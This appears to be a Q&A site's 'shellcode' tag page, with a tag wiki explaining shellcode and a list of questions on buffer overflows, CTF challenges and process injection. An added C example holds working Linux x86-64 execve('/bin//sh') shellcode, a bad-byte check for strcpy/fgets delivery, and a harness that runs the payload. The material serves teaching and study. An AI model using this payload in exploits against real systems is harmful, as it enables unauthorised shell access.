Questions tagged [shellcode]

Shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability.

Shellcode gets its name because it traditionally starts a command shell from which the attacker can control the compromised machine. It is usually written directly in machine code, and because it has to survive delivery through the vulnerable program it is typically position-independent and avoids the bytes the vulnerable input path would stop at (for example 0x00 for strcpy() or 0x0a for fgets()); still, any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to spawning a shell, some have suggested that the name is too narrow.

Shellcode is classified as local or remote. Local shellcode is used by an attacker who already has limited access to the machine it runs on and wants more control, typically higher privileges. Remote shellcode gives an attacker on another machine control over the target through the network, either by listening for a connection (bindshell) or by connecting back to the attacker (reverse shell).
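As an added example, not part of the tag wiki or of any question on this page: a hand-assembled Linux x86-64 execve("/bin//sh") shellcode, the bad-byte check a practitioner runs before delivering a payload through strcpy() or fgets(), and a harness that copies the bytes into an executable mapping and runs them in a forked child. The byte encodings are my own assumptions, checked against the x86-64 instruction encoding; the harness assumes Linux on x86-64, an RWX anonymous mapping being permitted, and /bin/sh being present. The `tainted_sample` array is constructed input for the check.

```c
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/wait.h>

/* Linux x86-64 execve("/bin//sh", {"/bin//sh", NULL}, NULL), 28 bytes.
 * Hand-assembled (assumption: encodings verified by the editor, not taken
 * from the page). Every byte is non-zero so a strcpy()-style copy delivers
 * it intact, and there is no 0x0a so fgets() will not cut it short. */
static const unsigned char execve_sh[] = {
    0x48, 0x31, 0xf6,                         /* xor  rsi, rsi              */
    0x56,                                     /* push rsi   (string NUL)    */
    0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e,
                0x2f, 0x2f, 0x73, 0x68,       /* mov  rdi, "/bin//sh"       */
    0x57,                                     /* push rdi   (string bytes)  */
    0x54, 0x5f,                               /* push rsp; pop rdi = &str   */
    0x56, 0x57,                               /* push NULL; push &str: argv */
    0x48, 0x89, 0xe6,                         /* mov  rsi, rsp  (argv)      */
    0x6a, 0x3b, 0x58,                         /* push 59; pop rax (execve)  */
    0x99,                                     /* cdq  -> rdx = 0 (envp)     */
    0x0f, 0x05                                /* syscall                    */
};

/* Bytes the usual delivery paths stop at: 0x00 for strcpy(), 0x0a for fgets(). */
static const unsigned char bad_chars[] = { 0x00, 0x0a };

/* Constructed sample: NOP sled with a NUL at offset 3 and a newline at 4. */
static const unsigned char tainted_sample[] = { 0x90, 0x90, 0x90, 0x00, 0x0a, 0x90 };

/* Number of bytes of sc[0..len) that occur in bad[0..nbad). */
size_t count_bad_bytes(const unsigned char *sc, size_t len,
                       const unsigned char *bad, size_t nbad)
{
    size_t hits = 0;
    for (size_t i = 0; i < len; i++)
        if (memchr(bad, sc[i], nbad) != NULL)
            hits++;
    return hits;
}

/* Offset of the first bad byte, or -1 if the payload is clean. */
long first_bad_offset(const unsigned char *sc, size_t len,
                      const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++)
        if (memchr(bad, sc[i], nbad) != NULL)
            return (long)i;
    return -1;
}

/* Run sc from an RWX anonymous mapping in a forked child, with stdin on
 * /dev/null so the spawned /bin/sh reads EOF and exits at once.
 * Returns the child's exit status, or -1 if the harness itself failed. */
int run_shellcode_in_child(const unsigned char *sc, size_t len)
{
    void *page = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -1;
    memcpy(page, sc, len);

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        int fd = open("/dev/null", O_RDONLY);
        if (fd >= 0) {
            dup2(fd, STDIN_FILENO);
            close(fd);
        }
        ((void (*)(void))page)();   /* does not return if execve succeeds */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    size_t hits = count_bad_bytes(execve_sh, sizeof execve_sh,
                                  bad_chars, sizeof bad_chars);
    printf("payload: %zu bytes, %zu bad bytes\n", sizeof execve_sh, hits);
    printf("sample:  first bad byte at offset %ld\n",
           first_bad_offset(tainted_sample, sizeof tainted_sample,
                            bad_chars, sizeof bad_chars));
#if defined(__x86_64__) && defined(__linux__)
    if (hits == 0)
        printf("child shell exited with status %d\n",
               run_shellcode_in_child(execve_sh, sizeof execve_sh));
#endif
    return 0;
}
```

The bad-character list is the part to adapt: a payload that goes through fgets() must also avoid 0x0a, one that goes through a URL decoder or a tolower() call has its own set, and running the check before testing in gdb saves time chasing a payload that was silently truncated on the way in.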

681 questions
0 votes, 1 answer

Shellcode print character (64 bits)

I have a problem with this shellcode. When I run the assembler code it prints the character, but when I call it as a function from C it does not. I used gdb to test all the instructions executed and it seems to execute all the instructions. It is…
tuket

0 votes, 1 answer

Modifying a byte in memory using shellcode

I have been trying to create a simple chunk of shell code that allows me to modify a string by doing something simple like changing a letter, then print it out. _start: jmp short ender starter: xor ecx, ecx ;clear out…
user99545

0 votes, 1 answer

Shellcode gives SyntaxError in gdb

I'm trying to pass shellcode as the command-line argument in a C program. But gdb keeps giving me SyntaxError. What am I doing wrong? Below are the contents of the C program and the shellcode: vulnerable.c #include #include…
green

0 votes, 1 answer

Basic Shellcode for connect() Function

I am writing shellcode on Ubuntu 11.10 x86 and the registers prior to the int 0x80 syscall look like this: eax 0x66 ecx 0x8e60558 edx 0x0 ebx 0x3 which is set up for the connect() syscall. The value in the ecx register is an…
Bhubhu Hbuhdbus

0 votes, 2 answers

Shellcode searching for Bytes String: 0C330408Bh

I am learning how malware (Blackhole Exploit) works. I extracted the shellcode from a malicious code. I figured out everything except a search for the byte string. Can anyone help me with this? Why does this shellcode (most of the malicious…
Abhineet

-1 votes, 2 answers

Address woes from Hacking: The Art of Exploitation

I bought this book recently titled: Hacking: The Art of Exploitation (2nd Edition) and it's been bugging me so much lately. Anyway, with one of the examples, firstprog.c : #include int main() { int i; for(i=0; i < 10; i++) { // Loop 10…
jaykru

-1 votes, 1 answer

How can I input shellcode via stdin that will be read as shellcode instead of a string literal from stdin?

I am doing a (legal) binary exploitation practice and there is a vulnerable buffer to which I am trying to write a specific memory address. However the user input is collected via fgets from stdin and when I enter my input it does not get parsed as…
Emily

-1 votes, 1 answer

Buffer Overflow exploitation to get a shell

I've spent hours trying to figure out the problem about my exploitation. I tried to exploit the vuln-machine explained in this page:…
-1 votes, 1 answer

Exploit buffer overflow to read content of file with verification of input

I have a CTF challenge in which I've got a simple code vulnerable to buffer overflow (via strcpy) which looks like: #include #include int display(char *text) { char buffer[20]; strcpy(buffer, texte); …
E Epsylon

-1 votes, 1 answer

Thread Execution Differences Between CreateThread and CreateRemoteThread

I am trying to learn how to do process injections. First, I learn shellcode types in C/C++. However, I met a problem. One code is written by using CreateThread. That is okay but after CreateThread, I have to use WaitForSingleObject function to…
Pytai

-1 votes, 1 answer

How to change hex to shellcode bytes

0x62, 0x75, 0x66, 0x20, 0x3d, 0x20, 0x20, 0x62, 0x22, 0x22, 0x0a, 0xeb, 0x7c, 0x38, 0x5c, 0x78, 0x34, 0x65, 0x5c, 0x78, 0x32, 0x39, 0x5c, 0x78, 0x31, 0x35, 0x5c, 0x78, 0x39, 0x39, 0x5c, 0xeb, 0x34, 0xeb, 0x27, 0x65, 0x5c, 0x78, 0x64, 0x36, 0x5c,…
Ben kubi

-1 votes, 1 answer

How can I get this memory address in Protostar stack 5 CTF

I found this solution for solving Protostar's CTF stack5 challenge. The solution works, but I can't figure out how in the stack diagram section we get the address: 0xbffff800. I understand that NOPs have been added, but how do you get to how many…
-1 votes, 1 answer

Go: Why do processes/threads started using Win32 API funcs seem to hijack and kill the parent process?

Now, the following code does what it's supposed to do, load calc.exe into memory and execute it, and it does that fine. I've stitched together this code to show CreateThread() killing my program's execution flow right before popping calc.exe, simply after…
THX1339

-1 votes, 1 answer

Data found in PE full image but not in segment?

I have below C program which is compiled to binary: bin.c: #include #include int main(){ unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00"; printf("Shellcode Length: %d\n", strlen(buf)); int (*ret)() =…
hashy

-1 votes, 1 answer

How to create a native C++ DLL that I can run with rundll32.exe without specifying an entry point

How will I be able to create a native DLL that I can execute with rundll32.exe without specifying an entry point? Example: C:\> rundll32.exe mydll.dll. I created a DLL project in Visual Studio but I don't know where to put my code: DLL project…